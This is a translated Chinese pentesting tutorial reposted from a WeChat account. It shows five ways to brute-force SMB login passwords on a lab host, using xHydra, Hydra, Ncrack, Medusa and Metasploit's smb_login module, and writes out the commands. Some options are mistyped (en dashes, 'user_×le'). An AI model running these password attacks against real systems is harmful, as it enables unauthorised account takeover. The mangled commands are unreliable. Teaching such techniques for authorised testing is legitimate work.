渗透SMB登录口令的5种方法(渗透圣经系列-7)

原创
2019/10/27 23:18
阅读数 414


点击上方
“网络空间安全资讯”
可订阅!


导读

Keynote


大神Ammar Amer @cry__pto在Github上发布了《PENTESTING-BIBLE》(渗透圣经),汇总了渗透测试相关的经典文章,且将持续更新。紧贴实战,内容丰富,涵盖主题有:道德黑客,渗透测试,红队,网络安全,计算机等。Git地址:https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE


本译文原文为《5 Ways to Hack SMB Login Password》,作者:Raj Chandel


本文将学习如何通过目标主机的SMB端口获取控制权。不同场景需要不同的操作方法。



1xHydra


这是一个图形化的版本,通过SMB端口使用字典攻击方法攻击系统。

打开kali上的xHydra,选择Single Target option,设置目标IP,在Protocol选项中选择smb,给定端口号445:



进入Paasswords,选择Username List,给定用户名文本文件的路径。口令列表同样操作。



点击Start。字典开始攻击,得到结果:用户名pc21,口令123.



2Hydra


这是一个简单的kali下的命令行工具,打开终端输入:

hydra –L/root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb


-L:表示用户名列表路径

-P:表示口令列表路径


命令执行后发起字典攻击,查看结果:


3Ncrack


这也是kali下的一个工具,终端下输入命令:

ncrack –u /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445

-U:用户名列表文件路径

-P:口令列表文件路径

445:端口号



4Medusa


是一个高速并行的模块化登录暴破工具。支持多个允许远程认证的服务:

medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt


启动字典攻击,查看结果:


5Metasploit


该模块测试一定范围内机器的SMB登录并报告成功的登录。如果加载了数据库插件且连接到数据库,该模块会记录成功的登录和可访问的主机。


打开metaspolit输入:


use auxiliary/scanner/smb/smb_login
msf exploit (
smb_login)>set rhost 192.168.1.118
msf exploit (
smb_login)>set user_×le /root/Desktop/user.txt
msf exploit (
smb_login)>set pass_×le /root/Desktop/pass.txt
msf exploit (
smb_login)>set stop_on_success true
msf exploit (
smb_login)>exploit


auxiliary/scanner/smb/smb_login是我们将试图登录的模块;

/root/Desktop/user.txt 存储所有可能的用户名;

/root/Desktop/pass.txt 存储所有可能的口令;




                          


本文分享自微信公众号 - 网络空间安全资讯(cyber-news)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

展开阅读全文
打赏
0
0 收藏
分享
加载中
更多评论
打赏
0 评论
0 收藏
0
分享
返回顶部
顶部